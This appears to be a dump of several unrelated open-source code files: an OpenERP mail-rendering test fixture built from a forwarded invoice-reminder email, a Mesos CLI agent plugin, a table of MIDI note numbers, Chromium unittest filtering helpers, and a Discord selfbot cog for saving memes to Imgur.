<th nowrap="" valign="BASELINE" align="RIGHT">Subject:
</th>
<td>Fwd: TR: OpenERP S.A. Payment Reminder</td>
</tr>
<tr>
<th nowrap="" valign="BASELINE" align="RIGHT">Date: </th>
<td>Wed, 16 Oct 2013 14:11:13 +0200</td>
</tr>
<tr>
<th nowrap="" valign="BASELINE" align="RIGHT">From: </th>
<td>Christine Herrmann <a class="moz-txt-link-rfc2396E" href="mailto:che@openerp.com"><che@openerp.com></a></td>
</tr>
<tr>
<th nowrap="" valign="BASELINE" align="RIGHT">To: </th>
<td><a class="moz-txt-link-abbreviated" href="mailto:online@openerp.com">online@openerp.com</a></td>
</tr>
</tbody>
</table>
<br>
<br>
<br>
<div class="moz-forward-container"><br>
<br>
-------- Message original --------
<table class="moz-email-headers-table" border="0" cellpadding="0" cellspacing="0">
<tbody>
<tr>
<th nowrap="" valign="BASELINE" align="RIGHT">Sujet:
</th>
<td>TR: OpenERP S.A. Payment Reminder</td>
</tr>
<tr>
<th nowrap="" valign="BASELINE" align="RIGHT">Date :
</th>
<td>Wed, 16 Oct 2013 10:34:45 -0000</td>
</tr>
<tr>
<th nowrap="" valign="BASELINE" align="RIGHT">De : </th>
<td>Ida Siwatala <a class="moz-txt-link-rfc2396E" href="mailto:infos@inzoservices.com"><infos@inzoservices.com></a></td>
</tr>
<tr>
<th nowrap="" valign="BASELINE" align="RIGHT">Répondre
à : </th>
<td><a class="moz-txt-link-abbreviated" href="mailto:catchall@mail.odoo.com">catchall@mail.odoo.com</a></td>
</tr>
<tr>
<th nowrap="" valign="BASELINE" align="RIGHT">Pour :
</th>
<td>Christine Herrmann (che) <a class="moz-txt-link-rfc2396E" href="mailto:che@openerp.com"><che@openerp.com></a></td>
</tr>
</tbody>
</table>
<br>
<br>
<div>
<div class="WordSection1">
<p class="MsoNormal"><span style="font-size:11.0pt;font-family:"Calibri","sans-serif";color:#1F497D">Bonjour,</span></p>
<p class="MsoNormal"><span style="font-size:11.0pt;font-family:"Calibri","sans-serif";color:#1F497D"></span></p>
<p> </p>
<p class="MsoNormal"><span style="font-size:11.0pt;font-family:"Calibri","sans-serif";color:#1F497D">Pourriez-vous
me faire un retour sur ce point.</span></p>
<p class="MsoNormal"><span style="font-size:11.0pt;font-family:"Calibri","sans-serif";color:#1F497D"></span></p>
<p> </p>
<p class="MsoNormal"><span style="font-size:11.0pt;font-family:"Calibri","sans-serif";color:#1F497D">Cordialement</span></p>
<p class="MsoNormal"><span style="font-size:11.0pt;font-family:"Calibri","sans-serif";color:#1F497D"></span></p>
<p> </p>
<div>
<div style="border:none;border-top:solid #B5C4DF
1.0pt;padding:3.0pt 0cm 0cm 0cm">
<p class="MsoNormal"><b><span style="font-size:10.0pt;font-family:"Tahoma","sans-serif"">De :</span></b><span style="font-size:10.0pt;font-family:"Tahoma","sans-serif"">
Ida Siwatala [<a class="moz-txt-link-freetext" href="mailto:infos@inzoservices.com">mailto:infos@inzoservices.com</a>]
<br>
<b>Envoyé :</b> vendredi 4 octobre 2013 20:03<br>
<b>À :</b> 'Followers of
INZO-services-8-all-e-Maxime-Lisbonne-77176-Savigny-le-temple-France'<br>
<b>Objet :</b> RE: OpenERP S.A. Payment Reminder</span></p>
</div>
</div>
<p> </p>
<p class="MsoNormal"><span style="font-size:11.0pt;font-family:"Calibri","sans-serif";color:#1F497D">Bonsoir,</span></p>
<p class="MsoNormal"><span style="font-size:11.0pt;font-family:"Calibri","sans-serif";color:#1F497D"></span></p>
<p> </p>
<p class="MsoNormal"><span style="font-size:11.0pt;font-family:"Calibri","sans-serif";color:#1F497D">Je
me permets de revenir vers vous par écrit , car j’ai
fait 2 appels vers votre service en exposant mon
problème, mais je n’ai pas eu de retour.</span></p>
<p class="MsoNormal"><span style="font-size:11.0pt;font-family:"Calibri","sans-serif";color:#1F497D">Cela
fait un mois que j’ai fait la souscription de votre
produit, mais je me rends compte qu’il est pas adapté à
ma situation ( fonctionnalité manquante et surtout je
n’ai pas beaucoup de temps à passer à résoudre des
bugs). </span></p>
<p class="MsoNormal"><span style="font-size:11.0pt;font-family:"Calibri","sans-serif";color:#1F497D">C’est
pourquoi , j’ai demandé qu’un accord soit trouvé avec
vous pour annuler le contrat (tout en vous payant le
mois d’utilisation de septembre).</span></p>
<p class="MsoNormal"><span style="font-size:11.0pt;font-family:"Calibri","sans-serif";color:#1F497D"></span></p>
<p> </p>
<p class="MsoNormal"><span style="font-size:11.0pt;font-family:"Calibri","sans-serif";color:#1F497D">Pourriez-vous
me faire un retour sur ce point.</span></p>
<p class="MsoNormal"><span style="font-size:11.0pt;font-family:"Calibri","sans-serif";color:#1F497D"></span></p>
<p> </p>
<p class="MsoNormal"><span style="font-size:11.0pt;font-family:"Calibri","sans-serif";color:#1F497D">Cordialement,</span></p>
<p class="MsoNormal"><span style="font-size:11.0pt;font-family:"Calibri","sans-serif";color:#1F497D"></span></p>
<p> </p>
<p class="MsoNormal"><span style="font-size:11.0pt;font-family:"Calibri","sans-serif";color:#1F497D">Ida
Siwatala</span></p>
<p class="MsoNormal"><span style="font-size:11.0pt;font-family:"Calibri","sans-serif";color:#1F497D"></span></p>
<p> </p>
<p class="MsoNormal"><b><span style="font-size:10.0pt;font-family:"Tahoma","sans-serif"">De :</span></b><span style="font-size:10.0pt;font-family:"Tahoma","sans-serif"">
<a href="mailto:che@openerp.com">che@openerp.com</a>
[<a href="mailto:che@openerp.com">mailto:che@openerp.com</a>]
<br>
<b>Envoyé :</b> vendredi 4 octobre 2013 17:41<br>
<b>À :</b> <a href="mailto:infos@inzoservices.com">infos@inzoservices.com</a><br>
<b>Objet :</b> OpenERP S.A. Payment Reminder</span></p>
<p> </p>
<div>
<p style="background:white"><span style="font-size:9.0pt;font-family:"Arial","sans-serif";color:#222222">Dear
INZO services,</span></p>
<p style="background:white"><span style="font-size:9.0pt;font-family:"Arial","sans-serif";color:#222222">Exception
made if there was a mistake of ours, it seems that the
following amount stays unpaid. Please, take
appropriate measures in order to carry out this
payment in the next 8 days. </span></p>
<p class="MsoNormal" style="background:white"><span style="font-size:9.0pt;font-family:"Arial","sans-serif";color:#222222"></span></p>
<p> </p>
<table class="MsoNormalTable" style="width:100.0%;border:outset 1.5pt" width="100%" border="1" cellpadding="0">
<tbody>
<tr>
<td style="padding:.75pt .75pt .75pt .75pt">
<p class="MsoNormal">Date de facturation</p>
</td>
<td style="padding:.75pt .75pt .75pt .75pt">
<p class="MsoNormal">Description</p>
</td>
<td style="padding:.75pt .75pt .75pt .75pt">
<p class="MsoNormal">Reference</p>
</td>
<td style="padding:.75pt .75pt .75pt .75pt">
<p class="MsoNormal">Due Date</p>
</td>
<td style="padding:.75pt .75pt .75pt .75pt">
<p class="MsoNormal">Amount (€)</p>
</td>
<td style="padding:.75pt .75pt .75pt .75pt">
<p class="MsoNormal">Lit.</p>
</td>
</tr>
<tr>
<td style="padding:.75pt .75pt .75pt .75pt">
<p class="MsoNormal"><b>2013-09-24</b></p>
</td>
<td style="padding:.75pt .75pt .75pt .75pt">
<p class="MsoNormal"><b>2013/1121</b></p>
</td>
<td style="padding:.75pt .75pt .75pt .75pt">
<p class="MsoNormal"><b>Enterprise - Inzo Services
- Juillet 2013</b></p>
</td>
<td style="padding:.75pt .75pt .75pt .75pt">
<p class="MsoNormal"><b>2013-09-24</b></p>
</td>
<td style="padding:.75pt .75pt .75pt .75pt">
<p class="MsoNormal"><b>420.0</b></p>
</td>
<td style="padding:.75pt .75pt .75pt .75pt"><br>
</td>
</tr>
<tr>
<td style="padding:.75pt .75pt .75pt .75pt"><br>
</td>
<td style="border:none;padding:.75pt .75pt .75pt
.75pt"><br>
</td>
<td style="border:none;padding:.75pt .75pt .75pt
.75pt"><br>
</td>
<td style="border:none;padding:.75pt .75pt .75pt
.75pt"><br>
</td>
<td style="border:none;padding:.75pt .75pt .75pt
.75pt"><br>
</td>
<td style="border:none;padding:.75pt .75pt .75pt
.75pt"><br>
</td>
</tr>
</tbody>
</table>
<p class="MsoNormal" style="text-align:center;background:white" align="center"><span style="font-size:9.0pt;font-family:"Arial","sans-serif";color:#222222">Amount
due : 420.00 € </span></p>
<p style="background:white"><span style="font-size:9.0pt;font-family:"Arial","sans-serif";color:#222222">Would
your payment have been carried out after this mail was
sent, please ignore this message. Do not hesitate to
contact our accounting department. </span></p>
<p class="MsoNormal" style="background:white"><span style="font-size:9.0pt;font-family:"Arial","sans-serif";color:#222222"><br>
Best Regards, <br>
Aurore Lesage <br>
OpenERP<br>
Chaussée de Namur, 40 <br>
B-1367 Grand Rosières <br>
Tel: +32.81.81.37.00 - Fax: +32.81.73.35.01 <br>
E-mail : <a href="mailto:ale@openerp.com">ale@openerp.com</a> <br>
Web: <a href="http://www.openerp.com">http://www.openerp.com</a></span></p>
</div>
</div>
</div>
--<br>
INZO services <small>Sent by <a style="color:inherit" href="http://www.openerp.com">OpenERP
S.A.</a> using <a style="color:inherit" href="https://www.openerp.com/">OpenERP</a>.</small>
<small>Access your messages and documents <a style="color:inherit" href="https://accounts.openerp.com?db=openerp#action=mail.action_mail_redirect&login=che&message_id=5750830">in
OpenERP</a></small> <br>
<pre class="moz-signature" cols="72">--
Christine Herrmann
OpenERP
Chaussée de Namur, 40
B-1367 Grand Rosières
Tel: +32.81.81.37.00 - Fax: +32.81.73.35.01
Web: <a class="moz-txt-link-freetext" href="http://www.openerp.com">http://www.openerp.com</a> </pre>
<br>
</div>
<br>
<br>
</div>
<br>
</div>"""
BUG_2_IN = [
'read more',
'...',
]
BUG_2_OUT = [
    'Fwd: TR: OpenERP S.A',
    'fait un mois'
]
# BUG 20/08/2014: READ MORE NOT APPEARING
BUG3 = """<div class="oe_msg_body_long" style="/* display: none; */"><p>OpenERP has been upgraded to version 8.0.</p>
<h2>What's new in this upgrade?</h2>
<div class="document">
<ul>
<li><p class="first">New Warehouse Management System:</p>
<blockquote>
<p>Schedule your picking, packing, receptions and internal moves automatically with Odoo using
your own routing rules. Define push and pull rules to organize a warehouse or to manage
product moves between several warehouses. Track in detail all stock moves, not only in your
warehouse but wherever else it's taken as well (customers, suppliers or manufacturing
locations).</p>
</blockquote>
</li>
<li><p class="first">New Product Configurator</p>
</li>
<li><p class="first">Documentation generation from website forum:</p>
<blockquote>
<p>New module to generate a documentation from questions and responses from your forum.
The documentation manager can define a table of contents and any user, depending on their karma,
can link a question to an entry of this TOC.</p>
</blockquote>
</li>
<li><p class="first">New kanban view of documents (resumes and letters in recruitment, project documents...)</p>
</li>
<li><p class="first">E-Commerce:</p>
<blockquote>
<ul class="simple">
<li>Manage TIN in contact form for B2B.</li>
<li>Dedicated salesteam to easily manage leads and orders.</li>
</ul>
</blockquote>
</li>
<li><p class="first">Better Instant Messaging.</p>
</li>
<li><p class="first">Faster and Improved Search view: Search drawer now appears on top of the results, and is open
by default in reporting views</p>
</li>
<li><p class="first">Improved User Interface:</p>
<blockquote>
<ul class="simple">
<li>Popups have changed to be more responsive on tablets and smartphones.</li>
<li>New Stat Buttons: form views now have dynamic buttons showing some statistics about linked models.</li>
<li>Color code to check in one look availability of components in an MRP order.</li>
<li>Unified menu bar allows you to switch easily between the frontend (website) and backend</li>
<li>Results panel is now scrollable independently of the menu bars, keeping the navigation,
search bar and view switcher always within reach.</li>
</ul>
</blockquote>
</li>
<li><p class="first">User signature is now in HTML.</p>
</li>
<li><p class="first">New development API.</p>
</li>
<li><p class="first">Remove support for Outlook and Thunderbird plugins</p>
</li>
</ul>
</div>
<p>Enjoy the new OpenERP Online!</p><span class="oe_mail_reduce"><a href="#">read less</a></span></div>"""
BUG_3_IN = [
'read more',
'...',
]
BUG_3_OUT = [
'New kanban view of documents'
]
| agpl-3.0 |
reneploetz/mesos | src/python/cli_new/lib/cli/plugins/agent/main.py | 9 | 2612 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
The agent plugin.
"""
from cli.exceptions import CLIException
from cli.mesos import get_agents
from cli.plugins import PluginBase
from cli.util import Table
PLUGIN_NAME = "agent"
PLUGIN_CLASS = "Agent"
VERSION = "Mesos CLI Agent Plugin"
SHORT_HELP = "Interacts with the Mesos agents"
class Agent(PluginBase):
"""
The agent plugin.
"""
COMMANDS = {
"list": {
"arguments": [],
"flags": {},
"short_help": "List the Mesos agents.",
"long_help": "List information about the Mesos agents."
}
}
def list(self, argv):
"""
List the agents in a cluster by checking the /slaves endpoint.
"""
# pylint: disable=unused-argument
try:
master = self.config.master()
except Exception as exception:
raise CLIException("Unable to get leading master address: {error}"
.format(error=exception))
try:
agents = get_agents(master)
except Exception as exception:
raise CLIException("Unable to get agents from leading"
" master '{master}': {error}"
.format(master=master, error=exception))
if not agents:
print("The cluster does not have any agents.")
return
try:
table = Table(["Agent ID", "Hostname", "Active"])
for agent in agents:
table.add_row([agent["id"],
agent["hostname"],
str(agent["active"])])
except Exception as exception:
raise CLIException("Unable to build table of agents: {error}"
.format(error=exception))
print(str(table))
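`Table` is imported from `cli.util`, which is not part of this file. A minimal stand-in with the same `add_row`/`str(...)` interface might look like the sketch below — an illustration only, not Mesos's actual implementation:

```python
class Table(object):
    """Minimal stand-in for cli.util.Table: a header row plus data rows,
    rendered with each column padded to its widest cell."""

    def __init__(self, columns):
        # The header counts as the first row.
        self.rows = [list(columns)]

    def add_row(self, row):
        self.rows.append([str(cell) for cell in row])

    def __str__(self):
        widths = [max(len(row[i]) for row in self.rows)
                  for i in range(len(self.rows[0]))]
        return "\n".join(
            "  ".join(cell.ljust(width) for cell, width in zip(row, widths))
            for row in self.rows)
```

With this stand-in, the `list` command's loop would print one aligned line per agent under the header.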
| apache-2.0 |
nflanders9/bach-in-a-box | midi_dicts.py | 1 | 2721 | __author__ = 'Nick Flanders'
# MIDI note numbers (not frequencies in Hz): each value is 12 * octave plus the
# semitone offset from C, so C_0 = 0 and G_10 = 127.
frequencies = dict(A_0 = 9,
A_1 = 21,
A_2 = 33,
A_3 = 45,
A_4 = 57,
A_5 = 69,
A_6 = 81,
A_7 = 93,
A_8 = 105,
A_9 = 117,
Ab_0 = 8,
Ab_1 = 20,
Ab_2 = 32,
Ab_3 = 44,
Ab_4 = 56,
Ab_5 = 68,
Ab_6 = 80,
Ab_7 = 92,
Ab_8 = 104,
Ab_9 = 116,
As_0 = 10,
As_1 = 22,
As_2 = 34,
As_3 = 46,
As_4 = 58,
As_5 = 70,
As_6 = 82,
As_7 = 94,
As_8 = 106,
As_9 = 118,
B_0 = 11,
B_1 = 23,
B_2 = 35,
B_3 = 47,
B_4 = 59,
B_5 = 71,
B_6 = 83,
B_7 = 95,
B_8 = 107,
B_9 = 119,
Bb_0 = 10,
Bb_1 = 22,
Bb_2 = 34,
Bb_3 = 46,
Bb_4 = 58,
Bb_5 = 70,
Bb_6 = 82,
Bb_7 = 94,
Bb_8 = 106,
Bb_9 = 118,
C_0 = 0,
C_1 = 12,
C_10 = 120,
C_2 = 24,
C_3 = 36,
C_4 = 48,
C_5 = 60,
C_6 = 72,
C_7 = 84,
C_8 = 96,
C_9 = 108,
Cs_0 = 1,
Cs_1 = 13,
Cs_10 = 121,
Cs_2 = 25,
Cs_3 = 37,
Cs_4 = 49,
Cs_5 = 61,
Cs_6 = 73,
Cs_7 = 85,
Cs_8 = 97,
Cs_9 = 109,
D_0 = 2,
D_1 = 14,
D_10 = 122,
D_2 = 26,
D_3 = 38,
D_4 = 50,
D_5 = 62,
D_6 = 74,
D_7 = 86,
D_8 = 98,
D_9 = 110,
Db_0 = 1,
Db_1 = 13,
Db_10 = 121,
Db_2 = 25,
Db_3 = 37,
Db_4 = 49,
Db_5 = 61,
Db_6 = 73,
Db_7 = 85,
Db_8 = 97,
Db_9 = 109,
Ds_0 = 3,
Ds_1 = 15,
Ds_10 = 123,
Ds_2 = 27,
Ds_3 = 39,
Ds_4 = 51,
Ds_5 = 63,
Ds_6 = 75,
Ds_7 = 87,
Ds_8 = 99,
Ds_9 = 111,
E_0 = 4,
E_1 = 16,
E_10 = 124,
E_2 = 28,
E_3 = 40,
E_4 = 52,
E_5 = 64,
E_6 = 76,
E_7 = 88,
E_8 = 100,
E_9 = 112,
Eb_0 = 3,
Eb_1 = 15,
Eb_10 = 123,
Eb_2 = 27,
Eb_3 = 39,
Eb_4 = 51,
Eb_5 = 63,
Eb_6 = 75,
Eb_7 = 87,
Eb_8 = 99,
Eb_9 = 111,
F_0 = 5,
F_1 = 17,
F_10 = 125,
F_2 = 29,
F_3 = 41,
F_4 = 53,
F_5 = 65,
F_6 = 77,
F_7 = 89,
F_8 = 101,
F_9 = 113,
Fs_0 = 6,
Fs_1 = 18,
Fs_10 = 126,
Fs_2 = 30,
Fs_3 = 42,
Fs_4 = 54,
Fs_5 = 66,
Fs_6 = 78,
Fs_7 = 90,
Fs_8 = 102,
Fs_9 = 114,
G_0 = 7,
G_1 = 19,
G_10 = 127,
G_2 = 31,
G_3 = 43,
G_4 = 55,
G_5 = 67,
G_6 = 79,
G_7 = 91,
G_8 = 103,
G_9 = 115,
Gb_0 = 6,
Gb_1 = 18,
Gb_10 = 126,
Gb_2 = 30,
Gb_3 = 42,
Gb_4 = 54,
Gb_5 = 66,
Gb_6 = 78,
Gb_7 = 90,
Gb_8 = 102,
Gb_9 = 114,
Gs_0 = 8,
Gs_1 = 20,
Gs_2 = 32,
Gs_3 = 44,
Gs_4 = 56,
Gs_5 = 68,
Gs_6 = 80,
Gs_7 = 92,
Gs_8 = 104,
Gs_9 = 116)
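The values above follow a simple arithmetic rule: 12 × octave plus the semitone offset from C, with C_0 = 0. A hedged sketch of that rule — `SEMITONES` and `note_number` are illustrative names, not part of the original module:

```python
# Semitone offsets from C within one octave; sharps use the module's 's' suffix.
SEMITONES = {'C': 0, 'Cs': 1, 'Db': 1, 'D': 2, 'Ds': 3, 'Eb': 3, 'E': 4,
             'F': 5, 'Fs': 6, 'Gb': 6, 'G': 7, 'Gs': 8, 'Ab': 8, 'A': 9,
             'As': 10, 'Bb': 10, 'B': 11}

def note_number(name):
    """Compute the value stored under e.g. 'A_4' in the frequencies dict."""
    pitch, octave = name.rsplit('_', 1)
    return 12 * int(octave) + SEMITONES[pitch]
```

For example, `note_number('A_4')` reproduces the dict's `A_4 = 57`.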
| mit |
ThinkingBridge/platform_external_chromium_org | build/util/lib/common/unittest_util.py | 138 | 4879 | # Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Utilities for dealing with the python unittest module."""
import fnmatch
import sys
import unittest
class _TextTestResult(unittest._TextTestResult):
"""A test result class that can print formatted text results to a stream.
Results printed in conformance with gtest output format, like:
[ RUN ] autofill.AutofillTest.testAutofillInvalid: "test desc."
[ OK ] autofill.AutofillTest.testAutofillInvalid
[ RUN ] autofill.AutofillTest.testFillProfile: "test desc."
[ OK ] autofill.AutofillTest.testFillProfile
[ RUN ] autofill.AutofillTest.testFillProfileCrazyCharacters: "Test."
[ OK ] autofill.AutofillTest.testFillProfileCrazyCharacters
"""
def __init__(self, stream, descriptions, verbosity):
unittest._TextTestResult.__init__(self, stream, descriptions, verbosity)
self._fails = set()
def _GetTestURI(self, test):
return '%s.%s.%s' % (test.__class__.__module__,
test.__class__.__name__,
test._testMethodName)
def getDescription(self, test):
return '%s: "%s"' % (self._GetTestURI(test), test.shortDescription())
def startTest(self, test):
unittest.TestResult.startTest(self, test)
self.stream.writeln('[ RUN ] %s' % self.getDescription(test))
def addSuccess(self, test):
unittest.TestResult.addSuccess(self, test)
self.stream.writeln('[ OK ] %s' % self._GetTestURI(test))
def addError(self, test, err):
unittest.TestResult.addError(self, test, err)
self.stream.writeln('[ ERROR ] %s' % self._GetTestURI(test))
self._fails.add(self._GetTestURI(test))
def addFailure(self, test, err):
unittest.TestResult.addFailure(self, test, err)
self.stream.writeln('[ FAILED ] %s' % self._GetTestURI(test))
self._fails.add(self._GetTestURI(test))
def getRetestFilter(self):
return ':'.join(self._fails)
class TextTestRunner(unittest.TextTestRunner):
"""Test Runner for displaying test results in textual format.
Results are displayed in conformance with google test output.
"""
def __init__(self, verbosity=1):
unittest.TextTestRunner.__init__(self, stream=sys.stderr,
verbosity=verbosity)
def _makeResult(self):
return _TextTestResult(self.stream, self.descriptions, self.verbosity)
def GetTestsFromSuite(suite):
"""Returns all the tests from a given test suite."""
tests = []
for x in suite:
if isinstance(x, unittest.TestSuite):
tests += GetTestsFromSuite(x)
else:
tests += [x]
return tests
def GetTestNamesFromSuite(suite):
"""Returns a list of every test name in the given suite."""
  return [GetTestName(test) for test in GetTestsFromSuite(suite)]
def GetTestName(test):
"""Gets the test name of the given unittest test."""
return '.'.join([test.__class__.__module__,
test.__class__.__name__,
test._testMethodName])
def FilterTestSuite(suite, gtest_filter):
"""Returns a new filtered tests suite based on the given gtest filter.
See http://code.google.com/p/googletest/wiki/AdvancedGuide
for gtest_filter specification.
"""
return unittest.TestSuite(FilterTests(GetTestsFromSuite(suite), gtest_filter))
def FilterTests(all_tests, gtest_filter):
"""Filter a list of tests based on the given gtest filter.
Args:
all_tests: List of tests (unittest.TestSuite)
gtest_filter: Filter to apply.
Returns:
Filtered subset of the given list of tests.
"""
test_names = [GetTestName(test) for test in all_tests]
filtered_names = FilterTestNames(test_names, gtest_filter)
return [test for test in all_tests if GetTestName(test) in filtered_names]
def FilterTestNames(all_tests, gtest_filter):
"""Filter a list of test names based on the given gtest filter.
See http://code.google.com/p/googletest/wiki/AdvancedGuide
for gtest_filter specification.
Args:
all_tests: List of test names.
gtest_filter: Filter to apply.
Returns:
Filtered subset of the given list of test names.
"""
pattern_groups = gtest_filter.split('-')
positive_patterns = pattern_groups[0].split(':')
negative_patterns = None
if len(pattern_groups) > 1:
negative_patterns = pattern_groups[1].split(':')
tests = []
for test in all_tests:
# Test name must by matched by one positive pattern.
for pattern in positive_patterns:
if fnmatch.fnmatch(test, pattern):
break
else:
continue
# Test name must not be matched by any negative patterns.
for pattern in negative_patterns or []:
if fnmatch.fnmatch(test, pattern):
break
else:
tests += [test]
return tests
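The positive/negative pattern rules implemented above can be condensed into a standalone sketch with the same semantics — an illustrative restatement, not the Chromium code itself:

```python
import fnmatch

def filter_test_names(all_tests, gtest_filter):
    """Condensed form of the rules above: 'pos1:pos2-neg1:neg2' keeps a test
    name if it matches some positive pattern and no negative pattern."""
    groups = gtest_filter.split('-')
    positive = groups[0].split(':')
    negative = groups[1].split(':') if len(groups) > 1 else []
    return [test for test in all_tests
            if any(fnmatch.fnmatch(test, p) for p in positive)
            and not any(fnmatch.fnmatch(test, n) for n in negative)]
```

So `'mod.*-*.testB'` keeps every test under `mod` except those ending in `testB`.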
| bsd-3-clause |
LittleEndu/Little-Discord-Selfbot | cogs/memes.py | 1 | 19548 | import asyncio
import json
import os
import random
import aiohttp
import discord
from discord.ext import commands
class Memes:
"""
idk, it does meme stuff
"""
def __init__(self, bot):
self.IMGUR_API_LINK = "https://api.imgur.com/3/image"
self.bot = bot
self.config = bot.config
self._last_meme = None
if os.path.isfile("memes.json"):
with open("memes.json") as meme_file:
self.memes = json.load(meme_file)
else:
self.memes = list()
def save_memes(self):
for meme in self.memes:
random.shuffle(meme['tags'])
with open("memes.json", "w") as file_out:
json.dump(self.memes, file_out)
def normalize(self, string: str):
return string.replace("'", "").replace("fuck", "fck").lower().strip()
def find_best_meme(self, search_for, use_instants=True):
memes = []
before_tags = self.normalize(search_for).split()
search_tags = set()
for meme in self.memes:
assert isinstance(meme, dict)
for b_tag in before_tags:
for m_tag in meme['tags'] + meme.get('instants', list()):
if b_tag in m_tag:
search_tags.add(b_tag)
break
if not search_tags:
return []
if len(search_tags) > 1:
use_instants = False
self.bot.logger.trace(
'find_best_meme with search_for="{}" before_tags=[{}] search_tags=set({}) use_instants={}'.format(
search_for, ", ".join(before_tags), ", ".join(search_tags), use_instants))
for meme in self.memes:
assert isinstance(meme, dict)
will_add = True
for s_tag in search_tags:
is_in = False
if use_instants:
for instant in meme.get('instants', list()):
if s_tag == instant:
return [meme]
for m_tag in meme['tags']:
if s_tag in m_tag:
is_in = True
if not is_in:
will_add = False
if will_add:
memes.append(meme)
if len(memes) == 1:
self._last_meme = memes[0]
return memes
def has_instants(self, search_for):
search_tags = search_for.split()
for meme in self.memes:
assert isinstance(meme, dict)
for instant in meme.get('instants', list()):
for stag in search_tags:
if stag in instant:
return True
return False
async def ask(self, question: str):
to_del = await self.bot.say(self.bot.msg_prefix + question)
await asyncio.sleep(0.5)
response = await self.bot.wait_for_message(author=self.bot.user)
string = response.content
await self.bot.delete_message(to_del)
await self.bot.delete_message(response)
return string
@commands.command(pass_context=True, aliases=["addmeme", "snagmeme"])
async def savememe(self, ctx, url: str = ""):
"""
Saves the uploaded image
"""
if len(ctx.message.attachments) > 0 or url:
if len(ctx.message.attachments) > 0:
url = ctx.message.attachments[0]['url']
async with aiohttp.ClientSession() as session:
async with session.post(self.IMGUR_API_LINK,
data={'image': url, 'type': "URL"},
headers={"Authorization": "Client-ID {}".format(
self.config['imgur_client_id'])}) as response:
response_json = json.loads(await response.text())
response_tags = await self.ask("Please give tags")
if len(response_tags) > 0:
tags = self.normalize(response_tags).split()
else:
await self.bot.say(self.bot.msg_prefix + "No tags given... Aborting...")
return
info = {'tags': tags,
'delete_hash': response_json['data']['deletehash'],
'width': response_json['data']['width'],
'height': response_json['data']['height'],
'id': response_json['data']['id'],
'link': response_json['data']['link']}
self.memes.append(info)
self.save_memes()
self._last_meme = info
to_del = await self.bot.say(self.bot.msg_prefix + "\U0001f44d")
await asyncio.sleep(5)
await self.bot.delete_message(to_del)
await self.bot.delete_message(ctx.message)
else:
            await self.bot.say(self.bot.msg_prefix + "You didn't include an image...")
@commands.command(pass_context=True)
async def removememe(self, ctx, *, search_for: str):
"""
Will remove all memes it finds
"""
memes = self.find_best_meme(search_for)
if memes:
for meme in memes:
self.memes.remove(meme)
async with aiohttp.ClientSession() as session:
async with session.delete(self.IMGUR_API_LINK + "/{}".format(meme['delete_hash']),
headers={"Authorization": "Client-ID {}".format(
self.config['imgur_client_id'])}) as response:
response_json = json.loads(await response.text())
if response_json['success']:
await self.bot.say(self.bot.msg_prefix + "Successfully deleted")
else:
await self.bot.say(
self.bot.msg_prefix + "Local pointer deleted, imgur refused to delete...")
self.save_memes()
else:
await self.bot.say(self.bot.msg_prefix + "Didn't find such meme")
@commands.command(pass_context=True)
async def meme(self, ctx, *, search_for: str):
"""
meme response
"""
memes = self.find_best_meme(search_for)
if memes:
index = random.randint(0, len(memes) - 1)
if ctx.message.author.permissions_in(ctx.message.channel).embed_links:
em = discord.Embed()
em.set_image(url=memes[index]['link'])
await self.bot.send_message(ctx.message.channel, embed=em)
else:
await self.bot.say(self.bot.msg_prefix + memes[index]['link'])
await asyncio.sleep(5)
await self.bot.delete_message(ctx.message)
            memes[index]['usage'] = memes[index].setdefault('usage', 0) + 1
self._last_meme = memes[index]
else:
await self.bot.say(self.bot.msg_prefix + "Unable to find meme")
@commands.command(pass_context=True, aliases=["addinstantmeme"])
async def makeinstantmeme(self, ctx):
"""
Will make instant access string for meme
"""
string = await self.ask("What to search for?")
if not string:
await self.bot.say(self.bot.msg_prefix + "Please specify string... Aborting...")
return
memes = self.find_best_meme(string)
if len(memes) > 10:
await self.bot.say(self.bot.msg_prefix + "That returned too many memes... Aborting...")
return
index = 0
if len(memes) > 1:
mmm = "\n"
counter = 0
for meme in memes:
                mmm += "{}: {}\n".format(counter, meme['tags'])
                counter += 1
string = await self.ask("Choose what meme" + mmm)
try:
index = int(string)
            except ValueError:
await self.bot.say(self.bot.msg_prefix + "Unable to convert to int... Aborting...")
return
assert isinstance(self.memes, list)
try:
meme_index = self.memes.index(memes[index])
meme = self.memes[meme_index]
except ValueError:
await self.bot.say(self.bot.msg_prefix + "Meme found was not in memes???")
return
string = await self.ask("What will be used for instant access?")
for s in string.split():
if self.has_instants(s):
await self.bot.say(self.bot.msg_prefix + "Instant ``{}`` already in use.".format(s))
else:
meme.setdefault('instants', list()).append(s)
self.memes[meme_index] = meme
self.save_memes()
await self.bot.say(self.bot.msg_prefix + "Added instants")
@commands.command(pass_context=True)
async def removeinstantmeme(self, ctx, search_for: str):
"""
Removes instant access from meme
"""
for meme in self.memes[:]:
assert isinstance(meme, dict)
if search_for in meme.get('instants',list()):
assert isinstance(meme['instants'], list)
index = self.memes.index(meme)
try:
meme['instants'].remove(search_for)
self.memes[index] = meme
await self.bot.say(self.bot.msg_prefix + "Removed instant meme")
return
except ValueError:
pass
await self.bot.say(self.bot.msg_prefix + "Didn't find such meme")
@commands.command(pass_context=True, aliases=['findmemes', 'findmeme', 'listmeme'])
async def listmemes(self, ctx, *, search_for: str = ""):
"""
Lists memes
"""
self.save_memes()
if search_for:
memes = self.find_best_meme(search_for, False)
else:
memes = self.memes
if not memes:
await self.bot.say(self.bot.msg_prefix + "Unable to find anything")
return
mmm = self.bot.msg_prefix
counter = 1
for meme in memes:
assert isinstance(meme, dict)
if meme.get('instants', []):
next_m = "``{} (instants: {}): {}``, ".format(counter, ", ".join(meme['instants']),
" ".join(meme['tags']))
else:
next_m = "``{}: {}``, ".format(counter, " ".join(meme['tags']))
counter += 1
if len(next_m + mmm) < 2000:
mmm += next_m
else:
await self.bot.say(mmm[:-2])
mmm = self.bot.msg_prefix + next_m
